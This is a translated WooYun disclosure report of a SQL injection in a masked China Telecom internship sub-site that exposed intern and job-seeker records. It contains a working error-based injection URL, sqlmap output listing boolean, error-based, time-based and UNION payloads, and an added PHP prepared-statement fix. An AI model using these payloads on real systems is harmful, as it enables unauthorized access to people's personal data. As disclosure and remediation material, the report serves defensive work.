
Vulnerability Summary

Defect ID: wooyun-2015-0144241

Title: Carrier security: SQL injection in a China Telecom sub-site exposes a large amount of intern information

Vendor: China Telecom

Author: 路人甲

Submitted: 2015-09-30 16:11

Fixed: 2015-11-24 16:42

Published: 2015-11-24 16:42

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-09-30: Details sent to the vendor, awaiting the vendor's handling
2015-10-10: Vendor confirmed; details disclosed to the vendor only
2015-10-20: Details disclosed to core white hats and domain experts
2015-10-30: Details disclosed to regular white hats
2015-11-09: Details disclosed to intern white hats
2015-11-24: Details disclosed to the public

Brief description:

Information on interns, students and job seekers of all kinds.

Detailed description:

http://**.**.**.**/shixibao/e/extend/company.php?id=10504


http://**.**.**.**/shixibao/e/extend/company.php?id=10504%20and (select 1 from  (select count(*),concat((select version()),floor(rand(0)*2))x from  information_schema.tables group by x)a)#


[Screenshots: 1.jpg, 2.jpg, 3.jpg]


user:admin@**.**.**.**
database:shixibao1
version:5.6.16-log1


Throw it into sqlmap and run it.


[Screenshot: 4.jpg]


300 tables, containing a large amount of intern and job-seeker information.


[Screenshots: 5.jpg, 6.jpg]


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-2685 OR 5746=5746#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: id=-9802 OR 1 GROUP BY CONCAT(0x716b767671,(SELECT (CASE WHEN (5242=5242) THEN 1 ELSE 0 END)),0x717a706a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: id=(SELECT (CASE WHEN (5004=5004) THEN SLEEP(5) ELSE 5004*(SELECT 5004 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: id=-8000 UNION ALL SELECT CONCAT(0x716b767671,0x55514d6d4364655a7662,0x717a706a71)#
---
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL 5.0.12
Database: shixibao
[303 tables]

Proof of vulnerability:

Remediation:

Filter the parameter.
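The one-line fix above ("filter the parameter") in working code, as an added example that is not the site's own source: the injectable concatenation behind company.php?id= next to a hardened version that validates the id as an integer, binds it as a prepared-statement parameter, and keeps DBMS errors out of the response. The table and column names (company, id, name) and the connection details are assumptions.

```php
<?php
// Added example, not the vulnerable site's own code. The table and column
// names (company, id, name) and the connection details are assumptions.

// BEFORE: $_GET['id'] is concatenated into the SQL text, so a value such as
// "10504 and (select 1 from (...)a)#" is executed as SQL, and any MySQL error
// the app prints leaks version(), user() and schema names to the client.
function load_company_vulnerable(mysqli $db, array $get)
{
    $id  = isset($get['id']) ? $get['id'] : '';
    $res = $db->query("SELECT id, name FROM company WHERE id = " . $id);
    if ($res === false) {
        die('MySQL error: ' . $db->error);   // error text reaches the client
    }
    return $res->fetch_assoc();
}

// AFTER: this endpoint only ever takes a numeric id, so reject anything that
// is not a positive integer, bind the value instead of concatenating it, and
// log DBMS errors server-side only.
function load_company_hardened(mysqli $db, array $get)
{
    $id = filter_var(isset($get['id']) ? $get['id'] : null,
                     FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {             // "10504 and (...)" or "-2685 OR 5746=5746#" stops here
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT id, name FROM company WHERE id = ?');
    if ($stmt === false || !$stmt->bind_param('i', $id) || !$stmt->execute()) {
        error_log('company lookup failed: ' . $db->error);   // never echoed to the client
        http_response_code(500);
        return null;
    }
    $stmt->bind_result($rowId, $rowName);
    $row = $stmt->fetch() ? array('id' => $rowId, 'name' => $rowName) : null;
    $stmt->close();
    return $row;
}

// Placeholder credentials; the real app would load these from its config.
$db = new mysqli('127.0.0.1', 'app_user', 'app_pass', 'shixibao');
header('Content-Type: application/json');
echo json_encode(load_company_hardened($db, $_GET));
```

The hardened version is written for the PHP 5.5 line the sqlmap banner reports, so it avoids PHP 7 syntax; on PHP 7+ the same pattern works unchanged.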

Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: High

Rank: 12

Confirmed: 2015-10-10 16:40

Vendor reply:

CNVD has confirmed and reproduced the described situation and has forwarded it through CNCERT to China Telecom Group Corporation, which will coordinate handling with the unit that administers the site.

Latest status:

None yet

